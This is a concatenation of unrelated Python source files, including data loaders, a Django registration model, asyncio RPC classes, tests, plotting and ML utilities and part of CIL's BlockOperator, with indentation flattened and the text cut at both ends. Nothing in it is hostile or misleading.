except IndexError:
raise StopIteration
return IterObject(self)
example_file = """0 1050.0 1013.92
1 1050.0 1025.65
2 1138.3 1010.90
3 1118.9 1050.0
4 1119.0 995.0
5 1050.0 1006.98
6 1050.0 1015.05
7 1050.0 1011.7
9 1021.0 880.0
10 1182.0 997.0
11 1116.0 999.9
12 1132.0 996.8
13 1220.0 992.0
14 750.0 1003.7
15 1107.0 902.1
16 999.9 999.8
17 1050.0 1015.0
33 1212. 1212.4
34 1086. 1080.
37 1152. 1370.
40 687. 1011.
55 1063.05 936.63
66 1181.69 1266.05
77 1175.0 1047.0
88 1103.9 1025.0
"""
example_wheel_file = """0 'Open' 0
1 'Hal_rs45 696_5' 58
2 'u'_Slo 350_65' 82
3 'u'_Slo 353_55' 109
4 'Halp 656_3' 21
5 'Cont 662_4' 77
6 '[SII] 672_5' 123
"""
if __name__ == '__main__':
from io import StringIO
print "Sample: 6th row with no converters"
print FileLoader(StringIO(example_file))[5]
print
print "Sample: 6th row with converters = {0: int, 1:float}"
print FileLoader(StringIO(example_file),
coltypes = {0: int, 1:float})[5]
print
print "Sample: Iterate over the whole file; converters = {0: int, 1:float, 2:float}"
fl = FileLoader(StringIO(example_file),
coltypes = {0: int, 1:float, 2:float})
for tpl in fl:
print tpl
print "Sample: Iterate over a wheel file"
fl = WheelLoader(StringIO(example_wheel_file))
for tpl in fl:
print tpl
|
#!/usr/bin/python3
import time
numbers = [2, 56, 90, 8076, 32, 46, 24, 13, 87, 7, 34, 923]
number = 24
start = 0
end = len(numbers)  # search window is numbers[start:end)
counter = 0
numbers.sort()
while True:
time.sleep(2)
counter += 1
print("\nAttempt:", counter)
print("Slice:", numbers[start:end])
idx = len(numbers[start:end]) // 2
print("Index:", idx)
guess = numbers[start:end][idx]
print("Guess:", guess)
if number == guess:
print("Found it:", guess)
break
elif number < guess:
end = start + idx
print("Number is less than", guess)
elif number > guess:
start = start + idx + 1
print("Number is greater than", guess)
|
from __future__ import unicode_literals
from json import dumps, loads
import requests
from django.db import models
from django.utils.translation import ugettext_lazy as _
from solo.models import SingletonModel
from installation.models import Installation
from lock_manager import Lock, LockError
from .literals import FORM_KEY, FORM_RECEIVER_FIELD, FORM_SUBMIT_URL, TIMEOUT
from .exceptions import AlreadyRegistered
class RegistrationSingleton(SingletonModel):
_cached_name = None
_registered = None
registered = models.BooleanField(default=False, verbose_name=_('Registered'))
registration_data = models.TextField(verbose_name=_('Registration data'), blank=True)
@classmethod
def registration_state(cls):
if cls._registered:
return cls._registered
else:
instance = cls.objects.get()
if instance.is_registered:
cls._registered = instance.is_registered
return instance.is_registered
@classmethod
def registered_name(cls):
if cls._cached_name:
return cls._cached_name
else:
instance = cls.objects.get()
try:
dictionary = loads(instance.registration_data)
except ValueError:
dictionary = {}
name_value = dictionary.get('company') or dictionary.get('name')
if name_value:
cls._cached_name = name_value
return name_value or _('No name')
@property
def is_registered(self):
return self.registered
def register(self, form_data):
if self.is_registered:
raise AlreadyRegistered
installation = Installation.objects.get()
dictionary = {}
dictionary.update(form_data)
dictionary.update({
'uuid': installation.uuid
})
self.registration_data = dumps(dictionary)
self.save()
self.submit()
def submit(self):
try:
lock = Lock.acquire_lock('upload_registration')
except LockError:
pass
else:
try:
requests.post(FORM_SUBMIT_URL, data={'formkey': FORM_KEY, FORM_RECEIVER_FIELD: self.registration_data}, timeout=TIMEOUT)
except Exception:
raise
else:
self.registered = True
self.save()
finally:
lock.release()
class Meta:
verbose_name = verbose_name_plural = _('Registration properties')
|
from asyncio import BaseEventLoop, WriteTransport, SubprocessTransport, Transport
from threading import Thread
from concurrent.futures import Future
from amino import Dat, List, ADT, Maybe, Nothing, Just, Path
from amino.logging import module_log
from ribosome.rpc.concurrency import OnMessage, OnError
from ribosome.rpc.error import processing_error, RpcReadErrorUnknown
log = module_log()
class AsyncioPipes(ADT['AsyncioPipes']):
pass
class AsyncioEmbed(AsyncioPipes):
def __init__(self, proc: List[str]) -> None:
self.proc = proc
class AsyncioStdio(AsyncioPipes):
pass
class AsyncioSocket(AsyncioPipes):
def __init__(self, path: Path) -> None:
self.path = path
class AsyncioLoopThread(Dat['AsyncioLoopThread']):
def __init__(self, thread: Maybe[Thread]) -> None:
self.thread = thread
def update(self, thread: Thread) -> None:
self.thread = Just(thread)
def reset(self) -> None:
self.thread = Nothing
class AsyncioResources(Dat['AsyncioResources']):
@staticmethod
def cons(
transport: Future,
) -> 'AsyncioResources':
return AsyncioResources(
transport,
)
def __init__(self, transport: Future) -> None:
self.transport = transport
class Asyncio(Dat['Asyncio']):
@staticmethod
def cons(
loop: BaseEventLoop,
pipes: AsyncioPipes,
resources: AsyncioResources,
thread: AsyncioLoopThread=None,
) -> 'Asyncio':
return Asyncio(loop, pipes, resources, thread or AsyncioLoopThread(Nothing))
def __init__(
self,
loop: BaseEventLoop,
pipes: AsyncioPipes,
resources: AsyncioResources,
thread: AsyncioLoopThread,
) -> None:
self.loop = loop
self.pipes = pipes
self.resources = resources
self.thread = thread
class EmbedProto(Dat['EmbedProto']):
def __init__(self, asio: Asyncio, on_message: OnMessage, on_error: OnError) -> None:
self.asio = asio
self.on_message = on_message
self.on_error = on_error
def connection_made(self, transport: SubprocessTransport) -> None:
self.asio.resources.transport.set_result(transport.get_pipe_transport(0))
def connection_lost(self, exc: Exception) -> None:
pass
def pipe_connection_lost(self, fd: int, exc: Exception) -> None:
pass
def pipe_data_received(self, fd: int, data: bytes) -> None:
if fd == 1:
self.on_message(data).attempt.leffect(processing_error(data))
else:
self.on_error(RpcReadErrorUnknown(data or b'no error message')).attempt.leffect(processing_error(None))
def process_exited(self) -> None:
pass
class BasicProto(Dat['BasicProto']):
def __init__(self, asio: Asyncio, on_message: OnMessage, on_error: OnError) -> None:
self.asio = asio
self.on_message = on_message
self.on_error = on_error
def connection_made(self, transport: Transport) -> None:
try:
if isinstance(transport, WriteTransport):
self.asio.resources.transport.set_result(transport)
except Exception as e:
log.caught_exception(f'setting transport {transport}', e)
def connection_lost(self, exc: Exception) -> None:
pass
def data_received(self, data: bytes) -> None:
self.on_message(data).attempt.leffect(processing_error(data))
def eof_received(self) -> None:
pass
__all__ = ('EmbedProto', 'BasicProto', 'AsyncioPipes', 'AsyncioEmbed', 'AsyncioStdio', 'AsyncioSocket',
'AsyncioLoopThread', 'AsyncioResources', 'Asyncio',)
|
# Copyright Contributors to the Packit project.
# SPDX-License-Identifier: MIT
"""The 'source-git' subcommand for Packit"""
import click
from packit.cli.update_dist_git import update_dist_git
from packit.cli.update_source_git import update_source_git
from packit.cli.source_git_init import source_git_init
from packit.cli.source_git_status import source_git_status
@click.group("source-git")
def source_git():
"""Subcommand to collect source-git related functionality"""
pass
source_git.add_command(update_dist_git)
source_git.add_command(update_source_git)
source_git.add_command(source_git_init)
source_git.add_command(source_git_status)
|
import json
from oneparams.api.base_diff import BaseDiff
from oneparams.utils import create_email, string_normalize
class ApiCliente(BaseDiff):
items = {}
list_details = {}
first_get = False
def __init__(self):
self.url_get_all = "/CliForCols/ListaDetalhesClientes"
super().__init__(
key_id="clienteId",
key_name="nomeCompleto",
key_active="ativoCliente",
item_name="client",
url_create="/OCliForColsUsuarioPerfil/CreateClientes",
url_update="/OCliForColsUsuarioFiliais/UpdateClientes",
url_get_all=self.url_get_all,
url_get_detail="/OCliente/Detalhesclientes",
key_detail="clientesCliForColsLightModel",
url_delete="/OCliForColsUsuario/DeleteCliente",
url_inactive="/OCliForColsUsuarioFiliais/UpdateClientes"
)
if not ApiCliente.first_get:
self.get_all()
ApiCliente.first_get = True
def get_all(self):
print("researching {}".format(self.item_name))
ApiCliente.items = {}
response = self.get(f'{self.url_get_all}/true')
self.status_ok(response)
content = json.loads(response.content)
for i in content:
ApiCliente.items[i["cliForColsId"]] = {
self.key_id: i["cliForColsId"],
self.key_active: True,
self.key_name: i[self.key_name],
"email": i["email"]
}
response = self.get(f'{self.url_get_all}/false')
content = json.loads(response.content)
for i in content:
ApiCliente.items[i["cliForColsId"]] = {
self.key_id: i["cliForColsId"],
self.key_active: False,
self.key_name: i[self.key_name],
"email": i["email"]
}
def add_item(self, data: dict, response: dict) -> int:
data = {
self.key_active: data[self.key_active],
self.key_name: data[self.key_name],
"email": data["email"]
}
return super().add_item(data, response)
def equals(self, data):
if data["email"] is None:
data.pop("email")
if data["celular"] is None:
data.pop("celular")
return super().equals(data)
def create(self, data):
if data["email"] is None:
data["email"] = create_email()
if data["celular"] is None:
data["celular"] = "00000000"
super().create(data)
def update(self, data):
if "email" not in data.keys():
data["email"] = self.details(data[self.key_id])["email"]
if "celular" not in data.keys():
data["celular"] = self.details(data[self.key_id])["celular"]
return super().update(data)
def item_id(self, data):
name = string_normalize(data[self.key_name]).strip()
for key, item in self.items.items():
existent_name = string_normalize(item[self.key_name]).strip()
if (existent_name == name
or item["email"] == data["email"]):
return key
return 0
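# item_id matches an existing client either by accent/case-normalised full name
# or by e-mail address, returning 0 when no match is found.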
|
from collections import deque
water_quantity = int(input())
names = deque([])
while True:
name = input()
if name == "Start":
break
names.append(name)
while True:
commands = input().split()
if commands[0] == "End":
print(f"{water_quantity} liters left")
break
elif commands[0] == "refill":
added_water = int(commands[1])
water_quantity += added_water
else:
person_liters = int(commands[0])
if person_liters > water_quantity:
person = names.popleft()
print(f"{person} must wait")
continue
person = names.popleft()
print(f"{person} got water")
water_quantity -= person_liters
|
from typing import Iterable
import matplotlib.axes
import matplotlib.pyplot as plt
import pandas as pd
import seaborn as sns
def rename_teachers(data: pd.DataFrame):
dic = {
"leitner": "Leitner",
"forward": "Conservative\nsampling",
"threshold": "Myopic",
}
for k, v in dic.items():
data["teacher"] = data["teacher"].replace([k], v)
return data
def boxplot_n_learnt(data: pd.DataFrame,
ax: matplotlib.axes.Axes = None,
ylim: Iterable = None,
x_label: str = "Teacher",
y_label: str = "Learned",
dot_size: int = 3,
dot_alpha: float = 0.7):
if ax is None:
fig, ax = plt.subplots()
data = rename_teachers(data)
data = data.rename(columns={
"n_learnt": y_label,
"teacher": x_label
})
order = ["Leitner", "Myopic", "Conservative\nsampling"]
colors = ["C0", "C1", "C2"]
sns.boxplot(x=x_label, y=y_label, data=data, ax=ax,
palette=colors, order=order,
showfliers=False)
sns.stripplot(x=x_label, y=y_label, data=data, s=dot_size,
color="0.25", alpha=dot_alpha, ax=ax, order=order)
ax.set_xticklabels(ax.get_xmajorticklabels(), fontsize=13)
if ylim is not None:
ax.set_ylim(*ylim)
ax.set_xlabel("")
|
from pycanlii.legislation import Legislation
from pycanlii.enums import Language, LegislationType, DateScheme
class TestLegislation:
def test__init__(self, legis_en, legis_fr, config):
en = Legislation(legis_en, config['key'], Language.en)
fr = Legislation(legis_fr, config['key'], Language.fr)
assert en.databaseId == legis_en['databaseId']
assert en.legislationId == legis_en['legislationId']
assert en.title == legis_en['title']
assert en.citation == legis_en['citation']
assert en.type == LegislationType[legis_en['type'].capitalize()]
assert en._key == config['key']
assert en._lang == Language.en
assert fr.databaseId == legis_fr['databaseId']
assert fr.legislationId == legis_fr['legislationId']
assert fr.title == legis_fr['title']
assert fr.citation == legis_fr['citation']
assert fr.type == LegislationType[legis_fr['type'].capitalize()]
assert fr._key == config['key']
assert fr._lang == Language.fr
def test_content(self, legislation):
legislation.content
def test__iter__(self, canlii):
db = canlii.legislation_databases()
for legis in db:
pass
def test__getitem__(self, canlii):
db = canlii.legislation_databases()
db[5]
def test_url(self, legislation, legis_en):
assert legislation.url == legis_en['url']
def test_dateScheme(self, legislation, legis_en):
assert legislation.dateScheme == DateScheme[legis_en['dateScheme']]
def test_startDate(self, legislation, legis_en):
assert legislation.startDate == legis_en['startDate']
def test_endDate(self, legislation, legis_en):
assert legislation.endDate == legis_en['endDate']
def test_repealed(self, legislation, legis_en):
if legis_en['repealed'] == "NO":
assert legislation.repealed == False
else:
assert legislation.repealed == True
|
#!/usr/bin/env python
import sys
import zmq
import numpy
def init_sockets(source, destination):
context = zmq.Context()
receiver = context.socket(zmq.PULL)
receiver.bind(source)
sender = context.socket(zmq.PUSH)
sender.connect(destination)
return receiver, sender
def send_array(socket, A, flags=0, copy=True, track=False):
"""send a numpy array with metadata"""
md = dict(
dtype = str(A.dtype),
shape = A.shape,
)
socket.send_json(md, flags|zmq.SNDMORE)
return socket.send(A, flags, copy=copy, track=track)
def recv_array(socket, flags=0, copy=True, track=False):
"""recv a numpy array"""
md = socket.recv_json(flags=flags)
msg = socket.recv(flags=flags, copy=copy, track=track)
buf = memoryview(msg)
A = numpy.frombuffer(buf, dtype=md['dtype'])
return A.reshape(md['shape'])
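# Minimal usage sketch (the endpoints are assumptions, not part of this module):
#   receiver, sender = init_sockets('tcp://*:5557', 'tcp://localhost:5558')
#   while True:
#       send_array(sender, recv_array(receiver))
# send_array ships a JSON header (dtype, shape) followed by the raw buffer, and
# recv_array rebuilds the ndarray from that metadata.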
|
# coding: utf-8
TARGET_DIR = '/app/EMonitor/Script'
|
"""
See: https://pydantic-docs.helpmanual.io/usage/types/#custom-data-types
"""
|
"""
Copyright (c) Facebook, Inc. and its affiliates.
This source code is licensed under the MIT license found in the
LICENSE file in the root directory of this source tree.
"""
import numpy as np
import pytest
import torch
from common.subsample import RandomMaskFunc
@pytest.mark.parametrize("center_fracs, accelerations, batch_size, dim", [
([0.2], [4], 4, 320),
([0.2, 0.4], [4, 8], 2, 368),
])
def test_random_mask_reuse(center_fracs, accelerations, batch_size, dim):
mask_func = RandomMaskFunc(center_fracs, accelerations)
shape = (batch_size, dim, dim, 2)
mask1 = mask_func(shape, seed=123)
mask2 = mask_func(shape, seed=123)
mask3 = mask_func(shape, seed=123)
assert torch.all(mask1 == mask2)
assert torch.all(mask2 == mask3)
@pytest.mark.parametrize("center_fracs, accelerations, batch_size, dim", [
([0.2], [4], 4, 320),
([0.2, 0.4], [4, 8], 2, 368),
])
def test_random_mask_low_freqs(center_fracs, accelerations, batch_size, dim):
mask_func = RandomMaskFunc(center_fracs, accelerations)
shape = (batch_size, dim, dim, 2)
mask = mask_func(shape, seed=123)
mask_shape = [1 for _ in shape]
mask_shape[-2] = dim
assert list(mask.shape) == mask_shape
num_low_freqs_matched = False
for center_frac in center_fracs:
num_low_freqs = int(round(dim * center_frac))
pad = (dim - num_low_freqs + 1) // 2
if np.all(mask[pad:pad + num_low_freqs].numpy() == 1):
num_low_freqs_matched = True
assert num_low_freqs_matched
|
from picamera import PiCamera, Color
import time
import sys
camera = PiCamera()
camera.annotate_text_size = 32
camera.annotate_background = Color("black")
camera.annotate_foreground = Color("white")
#camera.resolution = (576, 324)
camera.resolution = (1152, 648)
#camera.resolution = (1920, 1080)
#recordtime = 1795 #1 hour - 5 seconds to allow for camera reset
recordtime = 595
aCount = 0
while True:
try:
localtime = time.localtime(time.time())
filename = time.strftime("%Y%m%d%H%M%S", localtime)
timestamp = time.asctime(localtime)
print(timestamp)
filepath = "/home/pi/camera/video/" + filename + ".h264"
camera.start_preview(fullscreen=False, window=(100,100,1152,648))
print("start preview")
camera.start_recording(filepath)
print("start recording")
#print("Recording started: " + timestamp)
count = 0
while(count < recordtime):
localtime = time.localtime(time.time())
timestamp = time.asctime(localtime)
#camera.annotate_text = timestamp
camera.annotate_text = str(aCount)
camera.wait_recording(1)
count = count + 1
aCount = aCount + 1
except:
e = sys.exc_info()[0]
print(e)
finally:
camera.stop_recording()
print("stop recording")
camera.stop_preview()
print("stop preview")
time.sleep(5)#needed to reset camera
|
"""
Apply Thesaurus
===============================================================================
>>> from techminer2 import *
>>> directory = "data/"
>>> create_thesaurus(
... column="author_keywords",
... thesaurus_file="test_thesaurus.txt",
... sep="; ",
... directory=directory,
... )
- INFO - Creating thesaurus ...
- INFO - Thesaurus file 'data/processed/test_thesaurus.txt' created.
>>> apply_thesaurus(
... thesaurus_file="keywords.txt",
... input_column="author_keywords",
... output_column="author_keywords_thesaurus",
... strict=False,
... directory=directory,
... )
- INFO - The thesaurus file 'keywords.txt' was applied to column 'author_keywords'.
"""
import os
from . import logging
from ._read_records import read_filtered_records
from .map_ import map_
from .thesaurus import read_textfile
def apply_thesaurus(
thesaurus_file,
input_column,
output_column,
strict,
directory="./",
):
def apply_strict(x):
return thesaurus.apply_as_dict(x, strict=True)
def apply_unstrict(x):
return thesaurus.apply_as_dict(x, strict=False)
documents = read_filtered_records(directory)
thesaurus = read_textfile(os.path.join(directory, "processed", thesaurus_file))
thesaurus = thesaurus.compile_as_dict()
if strict:
documents[output_column] = map_(documents, input_column, apply_strict)
else:
documents[output_column] = map_(documents, input_column, apply_unstrict)
documents.to_csv(os.path.join(directory, "processed", "documents.csv"), index=False)
logging.info(
f"The thesaurus file '{thesaurus_file}' was applied to column '{input_column}'."
)
|
# Rahil Mehrizi, Oct 2018
"""Saving and Loading Checkpoint"""
import os, shutil
import torch
class Checkpoint():
def __init__(self, opt):
self.opt = opt
exp_dir = os.path.join(opt.exp_dir, opt.exp_id)
if opt.resume_prefix != '':
if 'pth' in opt.resume_prefix:
trunc_index = opt.resume_prefix.index('pth')
opt.resume_prefix = opt.resume_prefix[0:trunc_index - 1]
self.save_path = os.path.join(exp_dir, opt.resume_prefix)
else:
self.save_path = exp_dir
self.save_dir = os.path.join(opt.exp_dir, opt.exp_id)
def save_checkpoint(self, net, train_history, name):
lr_prefix = ('/lr-%.15f' % train_history.lr[-1]['lr']).rstrip('0').rstrip('.')
save_path = self.save_path + lr_prefix + ('-%d.pth.tar' % train_history.epoch[-1]['epoch'])
checkpoint = { 'train_history': train_history.state_dict(),
'state_dict': net.state_dict()}
torch.save( checkpoint, save_path )
print("=> saving '{}'".format(save_path))
if train_history.is_best:
print("=> saving '{}'".format(self.save_dir +'/' + name))
save_path2 = os.path.join(self.save_dir, name)
shutil.copyfile(save_path, save_path2)
def load_checkpoint(self, net, train_history, name):
        # join with os.path.join (as in save_checkpoint) so the directory and file name are combined correctly
        save_path = os.path.join(self.save_dir, name)
if os.path.isfile(save_path):
print("=> loading checkpoint '{}'".format(save_path))
checkpoint = torch.load(save_path)
train_history.load_state_dict( checkpoint['train_history'] )
new_params = net.state_dict() #new layers
old_params = checkpoint['state_dict'] #from checkpoint
new_params.update(old_params)
net.load_state_dict(new_params)
else:
print("=> no checkpoint found at '{}'".format(save_path))
|
import tensorflow as tf
from tensorflow.python.framework import graph_util
sess = tf.InteractiveSession()
# input shape: 1 x 2 x 2 x 3
input = tf.constant([[[[1, 2, 3], [4, 5, 6]], [[7, 8, 9], [10, 11, 12]]]])
# tf.pad expects one (before, after) pair per dimension of the rank-4 input;
# here dim 1 is padded by (3, 1) and dim 2 by (2, 0)
op = tf.pad(input, [[0, 0], [3, 1], [2, 0], [0, 0]], name='transpose_self')
target = op.eval()
print(target)
#constant_graph = graph_util.convert_variables_to_constants(sess, sess.graph_def, ['transpose_self'])
#
#with tf.gfile.FastGFile("transpose.pb", mode='wb') as f:
# f.write(constant_graph.SerializeToString());
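# For reference, the equivalent padding in NumPy (a sketch, separate from the
# graph-freezing experiment above):
#   np.pad(np.arange(1, 13).reshape(1, 2, 2, 3), [(0, 0), (3, 1), (2, 0), (0, 0)])
# which also produces a 1 x 6 x 4 x 3 array with zeros around the original values.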
|
import numpy as np
import torch
from aw_nas.dataset.data_augmentation import Preproc
class TrainAugmentation(object):
def __init__(self, size, mean, std, norm_factor=255., bias=0.):
"""
Args:
size: the size the of final image.
mean: mean pixel value per channel.
"""
self.mean = mean
self.std = std
self.norm_factor = norm_factor
self.bias = bias
self.preproc = Preproc(size, 0.6)
def __call__(self, img, boxes, labels):
"""
Args:
img: the output of cv.imread in RGB layout.
            boxes: bounding boxes in the form of (x1, y1, x2, y2).
labels: labels of boxes.
"""
img, boxes, labels = self.preproc(img, boxes, labels)
img /= self.norm_factor
img += self.bias
img -= np.array([self.mean]).reshape(-1, 1, 1)
img /= np.array([self.std]).reshape(-1, 1, 1)
return img, boxes, labels
class TestTransform(object):
def __init__(self, size, mean=0.0, std=1.0, norm_factor=255., bias=0.):
self.mean = mean
self.std = std
self.norm_factor = norm_factor
self.bias = bias
self.preproc = Preproc(size, -1)
def __call__(self, image, boxes, labels):
img, boxes, labels = self.preproc(image, boxes, labels)
img /= self.norm_factor
img += self.bias
img -= np.array([self.mean]).reshape(-1, 1, 1)
img /= np.array([self.std]).reshape(-1, 1, 1)
return img, boxes, labels
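# A self-contained sketch of the normalisation steps above (values are illustrative,
# not the project's defaults): scale by norm_factor, add the bias, then standardise
# each channel with the given mean and std.
if __name__ == "__main__":
    dummy = np.random.randint(0, 256, size=(3, 32, 32)).astype(np.float32)
    mean, std, norm_factor, bias = (0.485, 0.456, 0.406), (0.229, 0.224, 0.225), 255., 0.
    dummy /= norm_factor
    dummy += bias
    dummy -= np.array([mean]).reshape(-1, 1, 1)
    dummy /= np.array([std]).reshape(-1, 1, 1)
    print(dummy.shape, float(dummy.mean()))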
|
from torchquant.qmodule import *
from torchquant.utils import *
from torchquant.range_observers import *
|
from unittest.mock import patch
import pytest
from requests_cache.backends import DynamoDbCache, DynamoDbDict
from tests.conftest import AWS_OPTIONS, fail_if_no_connection
from tests.integration.base_cache_test import BaseCacheTest
from tests.integration.base_storage_test import BaseStorageTest
# Run this test module last, since the DynamoDB container takes the longest to initialize
pytestmark = pytest.mark.order(-1)
@pytest.fixture(scope='module', autouse=True)
@fail_if_no_connection
def ensure_connection():
"""Fail all tests in this module if DynamoDB is not running"""
import boto3
client = boto3.client('dynamodb', **AWS_OPTIONS)
client.describe_limits()
class TestDynamoDbDict(BaseStorageTest):
storage_class = DynamoDbDict
init_kwargs = AWS_OPTIONS
picklable = True
@patch('requests_cache.backends.dynamodb.boto3.resource')
def test_connection_kwargs(self, mock_resource):
"""A spot check to make sure optional connection kwargs gets passed to connection"""
DynamoDbDict('test', region_name='us-east-2', invalid_kwarg='???')
mock_resource.assert_called_with('dynamodb', region_name='us-east-2')
class TestDynamoDbCache(BaseCacheTest):
backend_class = DynamoDbCache
init_kwargs = AWS_OPTIONS
|
# -*- coding: utf-8 -*-
# This work is part of the Core Imaging Library (CIL) developed by CCPi
# (Collaborative Computational Project in Tomographic Imaging), with
# substantial contributions by UKRI-STFC and University of Manchester.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy
import functools
from cil.framework import ImageData, BlockDataContainer, DataContainer
from cil.optimisation.operators import Operator, LinearOperator
from cil.framework import BlockGeometry
try:
from sirf import SIRF
from sirf.SIRF import DataContainer as SIRFDataContainer
has_sirf = True
except ImportError as ie:
has_sirf = False
class BlockOperator(Operator):
r'''A Block matrix containing Operators
The Block Framework is a generic strategy to treat variational problems in the
following form:
.. math::
\min Regulariser + Fidelity
BlockOperators have a generic shape M x N, and when applied on an
    Nx1 BlockDataContainer, will yield an Mx1 BlockDataContainer.
    Notice: BlockDataContainers are only allowed to have the shape N x 1, with
    N rows and 1 column.
    The user may specify the shape of the block; by default the shape is
    (len(args), 1), i.e. a column of operators.
Operators in a Block are required to have the same domain column-wise and the
same range row-wise.
'''
__array_priority__ = 1
def __init__(self, *args, **kwargs):
'''
Class creator
Note:
Do not include the `self` parameter in the ``Args`` section.
Args:
:param: vararg (Operator): Operators in the block.
:param: shape (:obj:`tuple`, optional): If shape is passed the Operators in
vararg are considered input in a row-by-row fashion.
Shape and number of Operators must match.
Example:
            BlockOperator(op0,op1) results in a column block of shape (2,1)
            BlockOperator(op0,op1,shape=(1,2)) results in a row block of shape (1,2)
'''
self.operators = args
shape = kwargs.get('shape', None)
if shape is None:
shape = (len(args),1)
self.shape = shape
n_elements = functools.reduce(lambda x,y: x*y, shape, 1)
if len(args) != n_elements:
raise ValueError(
'Dimension and size do not match: expected {} got {}'
.format(n_elements,len(args)))
        # TODO
        # Until there is a reliable way to check equality of Acquisition/Image geometries
        # (required to fulfil "Operators in a Block are required to have the same
        # domain column-wise and the same range row-wise"), we do not check
        # column/row-wise compatibility here; that check would be performed by the
        # column_wise_compatible and row_wise_compatible methods.
# # test if operators are compatible
# if not self.column_wise_compatible():
# raise ValueError('Operators in each column must have the same domain')
# if not self.row_wise_compatible():
# raise ValueError('Operators in each row must have the same range')
def column_wise_compatible(self):
'''Operators in a Block should have the same domain per column'''
rows, cols = self.shape
compatible = True
for col in range(cols):
column_compatible = True
for row in range(1,rows):
dg0 = self.get_item(row-1,col).domain_geometry()
dg1 = self.get_item(row,col).domain_geometry()
if hasattr(dg0,'handle') and hasattr(dg1,'handle'):
column_compatible = True and column_compatible
else:
column_compatible = dg0.__dict__ == dg1.__dict__ and column_compatible
compatible = compatible and column_compatible
return compatible
def row_wise_compatible(self):
'''Operators in a Block should have the same range per row'''
rows, cols = self.shape
compatible = True
for row in range(rows):
row_compatible = True
for col in range(1,cols):
dg0 = self.get_item(row,col-1).range_geometry()
dg1 = self.get_item(row,col).range_geometry()
if hasattr(dg0,'handle') and hasattr(dg1,'handle'):
                    row_compatible = True and row_compatible
else:
row_compatible = dg0.__dict__ == dg1.__dict__ and row_compatible
compatible = compatible and row_compatible
return compatible
def get_item(self, row, col):
'''returns the Operator at specified row and col'''
if row > self.shape[0]:
raise ValueError('Requested row {} > max {}'.format(row, self.shape[0]))
if col > self.shape[1]:
raise ValueError('Requested col {} > max {}'.format(col, self.shape[1]))
index = row*self.shape[1]+col
return self.operators[index]
def norm(self, **kwargs):
'''Returns the norm of the BlockOperator
        If an operator in the block does not define a norm method (e.g. a SIRF
        AcquisitionModel), the PowerMethod is used when the operator is linear, otherwise an error is raised.
'''
norm = []
for op in self.operators:
if hasattr(op, 'norm'):
norm.append(op.norm(**kwargs) ** 2.)
else:
# use Power method
if op.is_linear():
                    norm.append(
                        # squared to be consistent with the squared norms collected above
                        LinearOperator.PowerMethod(op, 20)[0] ** 2.
                    )
else:
raise TypeError('Operator {} does not have a norm method and is not linear'.format(op))
return numpy.sqrt(sum(norm))
def direct(self, x, out=None):
'''Direct operation for the BlockOperator
BlockOperator work on BlockDataContainer, but they will work on DataContainers
and inherited classes by simple wrapping the input in a BlockDataContainer of shape (1,1)
'''
if not isinstance (x, BlockDataContainer):
x_b = BlockDataContainer(x)
else:
x_b = x
shape = self.get_output_shape(x_b.shape)
res = []
if out is None:
for row in range(self.shape[0]):
for col in range(self.shape[1]):
if col == 0:
prod = self.get_item(row,col).direct(x_b.get_item(col))
else:
prod += self.get_item(row,col).direct(x_b.get_item(col))
res.append(prod)
return BlockDataContainer(*res, shape=shape)
else:
tmp = self.range_geometry().allocate()
for row in range(self.shape[0]):
for col in range(self.shape[1]):
if col == 0:
self.get_item(row,col).direct(
x_b.get_item(col),
out=out.get_item(row))
else:
a = out.get_item(row)
self.get_item(row,col).direct(
x_b.get_item(col),
out=tmp.get_item(row))
a += tmp.get_item(row)
def adjoint(self, x, out=None):
'''Adjoint operation for the BlockOperator
BlockOperator may contain both LinearOperator and Operator
This method exists in BlockOperator as it is not known what type of
Operator it will contain.
BlockOperator work on BlockDataContainer, but they will work on DataContainers
and inherited classes by simple wrapping the input in a BlockDataContainer of shape (1,1)
Raises: ValueError if the contained Operators are not linear
'''
if not self.is_linear():
raise ValueError('Not all operators in Block are linear.')
if not isinstance (x, BlockDataContainer):
x_b = BlockDataContainer(x)
else:
x_b = x
shape = self.get_output_shape(x_b.shape, adjoint=True)
if out is None:
res = []
for col in range(self.shape[1]):
for row in range(self.shape[0]):
if row == 0:
prod = self.get_item(row, col).adjoint(x_b.get_item(row))
else:
prod += self.get_item(row, col).adjoint(x_b.get_item(row))
res.append(prod)
if self.shape[1]==1:
# the output is a single DataContainer, so we can take it out
return res[0]
else:
return BlockDataContainer(*res, shape=shape)
else:
for col in range(self.shape[1]):
for row in range(self.shape[0]):
if row == 0:
if issubclass(out.__class__, DataContainer) or \
( has_sirf and issubclass(out.__class__, SIRFDataContainer) ):
self.get_item(row, col).adjoint(
x_b.get_item(row),
out=out)
else:
op = self.get_item(row,col)
self.get_item(row, col).adjoint(
x_b.get_item(row),
out=out.get_item(col))
else:
if issubclass(out.__class__, DataContainer) or \
( has_sirf and issubclass(out.__class__, SIRFDataContainer) ):
out += self.get_item(row,col).adjoint(
x_b.get_item(row))
else:
a = out.get_item(col)
a += self.get_item(row,col).adjoint(
x_b.get_item(row),
)
def is_linear(self):
'''returns whether all the elements of the BlockOperator are linear'''
return functools.reduce(lambda x, y: x and y.is_linear(), self.operators, True)
def get_output_shape(self, xshape, adjoint=False):
'''returns the shape of the output BlockDataContainer
A(N,M) direct u(M,1) -> N,1
A(N,M)^T adjoint u(N,1) -> M,1
'''
rows , cols = self.shape
xrows, xcols = xshape
if xcols != 1:
raise ValueError('BlockDataContainer cannot have more than 1 column')
if adjoint:
if rows != xrows:
raise ValueError('Incompatible shapes {} {}'.format(self.shape, xshape))
return (cols,xcols)
if cols != xrows:
raise ValueError('Incompatible shapes {} {}'.format((rows,cols), xshape))
return (rows,xcols)
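    # Worked example: a (3, 2) block applied directly to a (2, 1) BlockDataContainer
    # gives output shape (3, 1); its adjoint applied to a (3, 1) container gives (2, 1).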
def __rmul__(self, scalar):
'''Defines the left multiplication with a scalar
        :param scalar: (number or iterable containing numbers)
Returns: a block operator with Scaled Operators inside'''
if isinstance (scalar, list) or isinstance(scalar, tuple) or \
isinstance(scalar, numpy.ndarray):
if len(scalar) != len(self.operators):
raise ValueError('dimensions of scalars and operators do not match')
scalars = scalar
else:
scalars = [scalar for _ in self.operators]
# create a list of ScaledOperator-s
ops = [ v * op for v,op in zip(scalars, self.operators)]
